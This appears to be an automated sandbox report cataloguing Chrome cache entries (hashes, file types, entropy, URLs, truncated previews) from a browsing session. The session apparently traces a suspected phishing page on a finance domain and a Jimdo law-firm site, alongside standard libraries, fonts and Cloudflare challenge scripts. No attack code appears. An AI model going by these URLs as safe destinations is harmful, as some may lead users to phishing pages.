SSDEEP:
MD5:	A3A41C8E4D94FDDEB9088038BFF02486
SHA1:	8C5D6A43F3EDF4F0A9C3A58E6F6EE78CE8ADC668
SHA-256:	D4BEF04AB8493BC6987D87C7E496C74C17B0F8EC3F309F2CDA35EB72F6FF92E5
SHA-512:	75435861ADE90D10A4C17DD658BB67E20551039FE055845BAF9AA11C0F0DB5E2CE129FF2D09D9E74CB9BCF6C13B10220151C9A2E138C8B559CE836DDCD94D3A5
Malicious:	false
Reputation:	unknown
URL:	https://www.primechoicefinance.com.au/dykjj.php
Preview:	<html>...<head>....<meta name="robots" content="noindex, nofollow">........<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.academics {position: relative;width: 80px;height: 80px;}.academics div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite academics;transform-origin: 40px 40px;}.academics div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #3B8AFF;margin: -4px 0 0 -4px;}.academics div:first-child {animation-delay: -36ms;}.academics div:first-child:after {top: 63px;left: 63px;}.academics div:nth-child(2) {animation-delay: -72ms;}.academics div:nth-child(2):after {top: 68px;left: 56px;}.academics div:nth-child(3) {animation-delay: -108ms;}.academics div:nth-child(3):after {top: 71px;left: 48px;}.academics div:nth-child(4) {animation-delay: -144ms;}.academics div:nth-child(4):a

Chrome Cache Entry: 110

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65342)
Category:	downloaded
Size (bytes):	232914
Entropy (8bit):	4.979822227315486
Encrypted:	false
SSDEEP:
MD5:	FE7FDFEC700D100DC745DC64D3600CB2
SHA1:	B231651E0FD68BBD8758189FBD3642C462D34FA6
SHA-256:	7F1D37F0D90B6385354C2AC10E2BB91563C46BD7A266ED351222EBCAC8496C2A
SHA-512:	B7819649564ED5E0BC04CDF7F5777B529870E6CD7B6BCEAD219223F2A4718672AE6FA5A8CA19EBC5E08831E02A04F81D646942706D8FAD98CC73E5ABEFCFB95E
Malicious:	false
Reputation:	unknown
URL:	https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css
Preview:	@charset "UTF-8";/!. Bootstrap v5.3.0 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,

Chrome Cache Entry: 111

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52276)
Category:	downloaded
Size (bytes):	102526
Entropy (8bit):	4.781903903660331
Encrypted:	false
SSDEEP:
MD5:	C43CD173EEEBA2F72AA6B431D06B8C07
SHA1:	427A692F7F39EABB3D5B8510AEE2743025DAF813
SHA-256:	C880EB3D25C765D399840AA204FEC22B3230310991089F14781F09A35ED80B8A
SHA-512:	02F6F6422B83104BC1E1B64961D7EDDA63635528417ED2DD3C6F0527457B8AB4CB43C528D2A70FC61E0F96AEC6E6D1A6D2B53ED523E1568B6D78BA41111C1393
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
Preview:	/!. Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-

Chrome Cache Entry: 112

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x316, components 3
Category:	downloaded
Size (bytes):	15300
Entropy (8bit):	7.905666799027405
Encrypted:	false
SSDEEP:
MD5:	3D17BFE4882224C7610142A6242AEFAB
SHA1:	06487DB191724F5D6B90E75AE9AA1C08AC805241
SHA-256:	912533A924AEFA661A0E3D8BD918C075AA2296C6CE7190D154D03D40C61B3D51
SHA-512:	8AAD906B55CEA6061471CAC225EA7A7A299B47490F2DDBA5A966FC2EB84801E203DC954A265720C38271C2B5979CE6D3AFC4A321CE14C0BDE181D402F23BDFA8
Malicious:	false
Reputation:	unknown
URL:	https://th.bing.com/th/id/OIP.jlr4lp51wKzaeV5Or0l2xgHaE8
Preview:	......JFIF.............BExif..MM........i................@........a..@....................C.......................................%..%....)).%756.2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......<...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...Q.v..Wi..S.......QJ(........P.b..(.N.{~..7..4.})pz.....?m.})...mJ#.....-<).0)q@......L.......I.......a....1@........R`......G.F.J..-P....5..F.0".ipjLQ.@...Rb...#......@..4.0}(..`8b.1Q.N..F?.&.M..xaJ..Z.cT..N...2,..b..;.I.s...#..T.Z.....sB..Q.L+.V..=h6...b......q..}.....O.i.^N;.............}).

Chrome Cache Entry: 113

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 156532, version 773.256
Category:	downloaded
Size (bytes):	156532
Entropy (8bit):	7.996386572265519
Encrypted:	true
SSDEEP:
MD5:	D465BCCB9EDF0873F021F66D4B09D89C
SHA1:	214F3C71DE28C682602AECD39E9AD2BBA15F1B0C
SHA-256:	F4C5A5B297E623BC159679563A4D1EB16E409CA3B57698FBC00FD2C907DADAE0
SHA-512:	35D7523F48386E89B1CAD6A47DF65D64415AB9C45E6425BB4AB25AC9510F6D2E9DE3D7CAD79C2491660E885D7A38D3FFA9E93EB50AE045FBD072DEAF114E10B8
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2
Preview:	wOF2......ct.......A..c(.........................6.$. .`..<......\.@..m. % ....PX.....6.F.h.....^.......f%.......~.....W.........7...../.....?.....q...i........h..s'@.I...D...V.F.)(V..`.7.B....u....J...I.U..9E..`M...Zf......R.&.t&&.j....-..$...";.:...9... .3;...8...j%.'.@....>=.Hbdj..W.@.<].'7..`..tja~.X.<<....O..@./)x."A..6.....A..V+...^.t[p.a.A............N.>ilUN.@ek..^ .U.%....E ...pz&..M..^5TWwAc.d.....C......6Y...y...e../f.P..:...v..._B..zBOO.......f7cv....;.\..`:.1. .bHZ.."E.T$E.5iE...y.e..)."..m...Cz{..Yr....?ij....W.UH.....P@w...h.:.."..I+..DR.-(Q....4r...(.R;HCg8.aw{.I..c8..,{..L.5......R..g.{.g.'..<...........X....G.H$E..(0H.).A..e.B..).2O.l..2..Z....I.g...L9Hr..y~...\......4...x.....x.&.!?....M&ix..E....7.'):K..l.R.......K.%R .x.m...f..Wr...)...{.....n9W.........=H....5J.=b...$BT.Q....$`.....3..UT..<....K..KM$._O.S....a........p....%S8.S.Na.....2.F.U.\.....\|.._.h.;.}L.....Y.Z..!..S.N.EG]..<_k.Y.}.!t/.<U.....:......P`B..4.B......

Chrome Cache Entry: 115

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1700
Entropy (8bit):	5.3411077766821125
Encrypted:	false
SSDEEP:
MD5:	33E70261AA35332F2CCEA37DD6E403B5
SHA1:	6C9E0966509BFA7D970958B0829BAA1BC65C573E
SHA-256:	B70E4E2DE1A4E918B7A1ABFAA38889F5668D810941EA4206BEF4823F0EC6CADE
SHA-512:	E1CC39C0A53155AD435FD58C434801B14B85DC9875CF968D8B1A1FBF20AD7E786C352DAFE3D6C87768BF0135E8E57257E3E8BE48D254F56CB0AAA3B7C3B32402
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.jimstatic.com/css?display=swap&family=Poppins:600,700"
Preview:	/* latin-ext /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./ latin /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./ latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 700;. font-display: swap;. src: url(https://fonts.jimsta

Chrome Cache Entry: 119

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 54 x 65, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.938086517995049
Encrypted:	false
SSDEEP:
MD5:	430EB6344488D0793D37EAF23F136493
SHA1:	597B096DAC85D50E53099B41B0CCF056ED146192
SHA-256:	97E14592DF737FD51C5F56FBA3A13F6865192A7F0548198F83AE783C976A84B5
SHA-512:	55AB01ABBB4269720BC9830598823EEC1041C1439EBA2B80FD1A3289A741AB46B87FEEEFA46065B875924749CAD201046BE5A5FA2CC341A2986F83737C25A31A
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8deda2ed5bbb6bb9/1730985793718/XB2P3qgmIrf7kLk
Preview:	.PNG........IHDR...6...A.............IDAT.....$.....IEND.B`.

Chrome Cache Entry: 121

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	107922
Entropy (8bit):	5.16833322430428
Encrypted:	false
SSDEEP:
MD5:	6A7950CC31489069917BF817B62B2BFE
SHA1:	44AAB6E9B8FDBAA23EA297CE69E26422277907C0
SHA-256:	1B4DACB0DAFDA81D48EE0890EA113B3B8275BF2D16D5325F971F16EB75F7218A
SHA-512:	0329712BC9EC144910DEE414B70181C4FD4145B65C78E2628BEE547A5DBC8D48BACD3BAA350451437C740493875DDD47FEC66C2C9189AA823A7B95DE8E9FA9F4
Malicious:	false
Reputation:	unknown
Preview:	!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("scc-c2",[],e):"object"==typeof exports?exports["scc-c2"]=e():t["scc-c2"]=e()}(self,(()=>(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e);var n={};t.r(n),t.d(n,{_isDebug:()=>d,debug:()=>O,error:()=>g,info:()=>h,log:()=>h,setDebug:()=>b,warn:()=>w});var r={};t.r(r),t.d(r,{cmdLogEvent:()=>Yo,cmdLogPerf:()=>ti});var o,i,a,c,u,f=(o="",a={document:i=Object.create({get cookie(){return o},set cookie(t){o=t}})},c={},"undefined"==typeof window?{window:a,document:i,navigator:c}:{window:window\|\|a,document:window.document\|\|i,navigator:navigator\|\|c}),s=function(){return f.

Chrome Cache Entry: 122

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	43
Entropy (8bit):	3.0314906788435274
Encrypted:	false
SSDEEP:
MD5:	325472601571F31E1BF00674C368D335
SHA1:	2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
SHA-256:	B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
SHA-512:	717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.............!.......,...........D..;

Chrome Cache Entry: 123

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
Category:	downloaded
Size (bytes):	18536
Entropy (8bit):	7.986571198050597
Encrypted:	false
SSDEEP:
MD5:	8EFF0B8045FD1959E117F85654AE7770
SHA1:	227FEE13CEB7C410B5C0BB8000258B6643CB6255
SHA-256:	89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
SHA-512:	2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......Hh..........H..............................Z..\|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.\|.......%..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.+.M E..`......R.$T

Chrome Cache Entry: 124

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 125

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 116672, version 773.256
Category:	downloaded
Size (bytes):	116672
Entropy (8bit):	7.9897401211491745
Encrypted:	false
SSDEEP:
MD5:	0474CCD4D3EC29857F1E7F8B9C56DF8B
SHA1:	3E8F0F46B2949DCC309F65FFF1372B9A05E8F480
SHA-256:	B66B3DA5FF7B2DB79B6CB5A22C3E762E2BF16958A11987E69EEB1980BBBCDFB0
SHA-512:	2AB61A54EE830519D0AACBA1E12F1AD920AEDDDEA8E682CEBE51BEC78ECD7BBC403343F8E00B45AFE804A954A52EB5DCC70983BB01239C36422F8E6F18E0BB5E
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2
Preview:	wOF2...................s.........................6.$. .`..H..V....L.... %H.qj..0=....yPF.....PUUO.a^..* ...o...o.........; ..o..~..u../..b...Y.u.K......2..w.._..p.....1.n/...../F..t....O.e..:.....?..........B.U...4...G".@7...J.I.TZB......3..;.....c.5i-m.8.Z.:.&..iS..'.G.G...........~....>D.U....,.................%.d.1...p.8a'...h.Q..0Tp.J....)&)q.......9W.D.Z...f..{.{...[g.5.v..E4y...DCt..1b\|./.....$.......$.'Y..m.,.......t...,6...Ni...)!f..-O.> '?..........L2....eDW.e..cY........B......-5../f...i......3.ai$.%[6.K..`..a.x...;.L.qN]vy...oC....g.:.3...I...d....Z....{+..@.eFV...92F.u...Vi..9...}...y.=..=r.=".?"s.=".?2..3..Lr".(Z....$..@....R.{&..#...L...0..h......H.-A.Y.$.`k..U.49Z,.f..Y'..`.f.f5..lVB(.2+p.[.@.........aCf...........F.Y...:kU-k.0....._.:..d8.,.$6.......ld29.....{.y..!..UF#..`P........M.....~.~.......FE+....W..a%......*j....j.=........y..~Y...=..]?.&......<...o.{....t....8.,......E ..%.@.E..G.h....Y.}.~d...5./...m4....r.

Chrome Cache Entry: 126

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8078), with no line terminators
Category:	downloaded
Size (bytes):	8078
Entropy (8bit):	5.752565087559016
Encrypted:	false
SSDEEP:
MD5:	9B405A4E3F836D6134719097CBFBF3A7
SHA1:	0504C5BA12FEC1E0DAC127EB0BDDEA08DB2D7501
SHA-256:	D24854F428E9A29BC4607687AAC94048F52FE7A97B4EBF4D7D53BC71A5E64FC0
SHA-512:	B63CA890BF7A400D24A12F09FD03E27685D068B7E530A57DB62D867C8960EE44213E3F9384026BA3768A77B1547748D44DCDB9B03DDD259E0FE918D8C5C4FF9C
Malicious:	false
Reputation:	unknown
URL:	https://ys-law-firm.jimdosite.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js?
Preview:	window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=-parseInt(U(472))/1(parseInt(U(444))/2)+parseInt(U(475))/3+-parseInt(U(480))/4+parseInt(U(440))/5(-parseInt(U(483))/6)+-parseInt(U(426))/7+-parseInt(U(478))/8+parseInt(U(448))/9,e===g)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,498088),h=this\|\|self,i=h[V(407)],j={},j[V(434)]='o',j[V(405)]='s',j[V(455)]='u',j[V(409)]='z',j[V(498)]='n',j[V(506)]='I',j[V(497)]='b',k=j,h[V(419)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,D===null\|\|void 0===D)return F;for(H=n(D),g[a0(510)][a0(428)]&&(H=H[a0(503)](g[a0(510)][a0(428)](D))),H=g[a0(415)][a0(453)]&&g[a0(474)]?g[a0(415)][a0(453)](new g[(a0(474))](H)):function(N,a1,O){for(a1=a0,N[a1(457)](),O=0;O<N[a1(466)];N[O+1]===N[O]?N[a1(443)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(412)][a0(490)](I),J=0;J<H[a0(466)];K=H[J],L=m(g,D,K),I(L)?(M='s'===L&&!g[a0(447)](D[K]),a0(456)===E+K?G(E+K,L):M\|\|G(E+K,D[K])):G(E+K,L),J+

Chrome Cache Entry: 80

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65458)
Category:	dropped
Size (bytes):	6004246
Entropy (8bit):	5.617235219218046
Encrypted:	false
SSDEEP:
MD5:	4288BC719BD67DEFA97130C59DC0B0C7
SHA1:	C8C022B609E3200D2315BD3D19A467E1F9E60899
SHA-256:	ADB515133C375BA0DE73C3206545D50E9952A07272466ADB982325BED7D7CD84
SHA-512:	1C6A613ED83BD296EE247F3EB731813CC88950CB64606BB0E5FAD8D8C9E634DDE576C7DB6DAA3CCF8B1DC86163528FCA32AEAFB7AA8AB1E6939CF2101B58DC8A
Malicious:	false
Reputation:	unknown
Preview:	/! For license information please see 91b897482768ed6bd165.js.LICENSE.txt /.(()=>{var e,t,n,i,a={24656:(e,t,n)=>{"use strict";n(26205).Cookie;var i=n(41820);t.QN=i.CKies,i.CookieOptions,i.CookieType},41820:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0});var i,a,o=n(26205);!function(e){e.NECESSARY="necessary",e.FUNCTIONAL="functional",e.PERFORMANCE="performance",e.MARKETING="marketing"}(i=t.CookieType\|\|(t.CookieType={})),function(e){e.ALLOW="allow",e.DENY="deny"}(a=t.CookieOptions\|\|(t.CookieOptions={})),t.CONFIG_EXPIRATION=31536e6;var r=function(){function e(){}return e.getExpireDate=function(){var e=new Date;return e.setTime(e.getTime()+t.CONFIG_EXPIRATION),e},e.key=function(e){return"ckies_"+e},e.use=function(e){return e===i.NECESSARY\|\|(this.isOptIn()?o.Cookie.get(this.key(e))===a.ALLOW:o.Cookie.get(this.key(e))!==a.DENY)},e.deny=function(e){this.set(e,a.DENY)},e.allow=function(e){this.set(e,a.ALLOW)},e.useNecessary=function(){return this.use(i.NECESSARY)},e.

Chrome Cache Entry: 81

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	549
Entropy (8bit):	6.943052302431237
Encrypted:	false
SSDEEP:
MD5:	FD400ADA20E53B4BB4EFBBEB0C0E16FD
SHA1:	16C4AEFE874E9B5952A1E72528E1011BD38D8772
SHA-256:	E29475FE49A5A23D5ECA32E07367AA425D4A1F32D75DFE7E6D8D0398C35802CE
SHA-512:	3B144B04507C840A7A0A350480B4846D4A37B98551DA2B993879FE5995A48FCAAB0C3967ACDE6B57C6FEB3FB43E3F28B5CBFB7D69B9E8FDBF573EFD577626967
Malicious:	false
Reputation:	unknown
URL:	https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png
Preview:	.PNG........IHDR... ... .....D.......sRGB.........PLTE...........'..1..4...........&........H..H..7.......!K!#M.......5.....J..D&(Q56].....;.......8..;...........WXw68^[\{...st...G........@\^\|...OPqtu.......gh.JKm......ACf..2..9UVv...........OQr..8.x.....:tRNS..Y...Y....Y..............................................7......IDAT8..W..0..O.I.`..{...?e..D`.O......0,.D.D..I$&......T.@..A..:.1@.._<A.t6....A.vN...@&K..'.....@....+.Vk.W.lZoP.l1.F.......C...xb.....\|.D.....o....n...G.......f.....K.}hqB.............{.!zf1;.....IEND.B`.

Chrome Cache Entry: 82

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8149), with no line terminators
Category:	dropped
Size (bytes):	8149
Entropy (8bit):	5.734599529346312
Encrypted:	false
SSDEEP:
MD5:	A548AD8F4E68C338F28DE641D72F534C
SHA1:	75ABB7DA872502F5F9C821C89D6243106EF1EBE3
SHA-256:	E640282A1F4046AD5916BE3C6881E7CA801D2DA9C0F823EE1E3F7E67F51E661F
SHA-512:	1188B306DE834CF0EB98A8D86BEF226D215F4BECE1B880E83B6A3F3EEFEED83B00D1F47406F720A8037D475F4EA829E919826655370D85A820D824F8CD043626
Malicious:	false
Reputation:	unknown
Preview:	window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,j,k,o,s,B){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(217))/1(-parseInt(U(136))/2)+-parseInt(U(201))/3(parseInt(U(182))/4)+-parseInt(U(220))/5(parseInt(U(223))/6)+-parseInt(U(130))/7+-parseInt(U(155))/8(-parseInt(U(195))/9)+-parseInt(U(141))/10+parseInt(U(179))/11,e===g)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,561398),h=this\|\|self,i=h[V(199)],j={},j[V(188)]='o',j[V(193)]='s',j[V(178)]='u',j[V(132)]='z',j[V(208)]='n',j[V(225)]='I',j[V(148)]='b',k=j,h[V(206)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D\|\|D===void 0)return F;for(H=n(D),g[a0(166)][a0(209)]&&(H=H[a0(181)](g[a0(166)][a0(209)](D))),H=g[a0(115)][a0(160)]&&g[a0(191)]?g[a0(115)][a0(160)](new g[(a0(191))](H)):function(N,a1,O){for(a1=a0,N[a1(204)](),O=0;O<N[a1(184)];N[O]===N[O+1]?N[a1(210)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(196)][a0(175)](I),J=0;J<H[a0(184)];K=H[J],L=m(g,D,K),I(L)?(M='s'===L&&!g[a0(149)](D[K]),a0(1

Chrome Cache Entry: 83

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6622
Entropy (8bit):	7.926690095935079
Encrypted:	false
SSDEEP:
MD5:	C8CF4AFEE91928B13DDA9026EDE4E909
SHA1:	25DF39165BF507F5D3E258DD71E056351C837760
SHA-256:	759E1043EA45EF5EC93343C3F610A8D9A76A250A123A26C337D1429E1022EF47
SHA-512:	857922E7A1013E616AD8857BF33D615E0E6383605CC1BE77CA323A6334CB83E86D54352F771E268D9EEE7E2FDE100EB66CDE5FA2F2E7261B65C1C906B9428E55
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......M............sRGB.........IDATx..]yx.E.....{rN....sq..r.. .DVE.....DvW.u?..]]...0..@."+!.......\.!$!!.!w&.{......1..g.d...g..NuuuU......QJ.:z...+.....0....N@...'...A...@j7)..0....( ...JHhhhlll..am..,:%...~^DdY...8`..Xy....PZ......a.Z^...L.....T........#P..d.8x....Z.../.x</.....?o4.0.t."..(.......{...B.p....Vw.\|...hx!.......'D.$......jC..Z..P^..P..Q.{..\|xAW_p...........7.v...=......=...sA.pL.....C.. !.......HN..=.z.....e..MI4...8.,. ....(.....q.}{.{...t....x......g..v".0.....9.......}......DdQ0.. ..@.,.N....s._..zED.2l..7N.S.dn....8-m..%..Q...(...EEE.s..T..j}.....b.JIg..JeQ.x~..%J/..../...d..Y..RB....)!.!.`4.G.".tA.nk.._nY...3f\|..cIW....pff&..YV_...u.\.}..,...-.........T..L.Pz..S............F...\..B.P.j.]P.......-.Y...q....+...32g.8.F... f..>..g..X..n.u.*.`YN}.HD..,Z..^...JH.=.G...G.r..e.P......`.D.xCQ......^.<.....I7..>AY...,c..6\|..+.......(-9.0Ki.C..J)...1199EY../\....0.VKI...R..8A...:...........\|...........$../

Chrome Cache Entry: 84

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3
Category:	dropped
Size (bytes):	21813
Entropy (8bit):	7.936500938014413
Encrypted:	false
SSDEEP:
MD5:	C02C44CF203706A2E1B770659969FC84
SHA1:	93DDACCB1C1BAC11BFC8A8018E16DBD062E7E8A6
SHA-256:	A64757546767E257E952BB22D50E86737A23C84992D776D8352E86EF713994F4
SHA-512:	D0B35ADEF1A91B8741F79E986B00BC21A52E7FA55667E8E6B371C6890A47CF26D7D0777DCDC9B7B0416604EB0E47EC390F1D973611FDED2F6025619D38469943
Malicious:	false
Reputation:	unknown
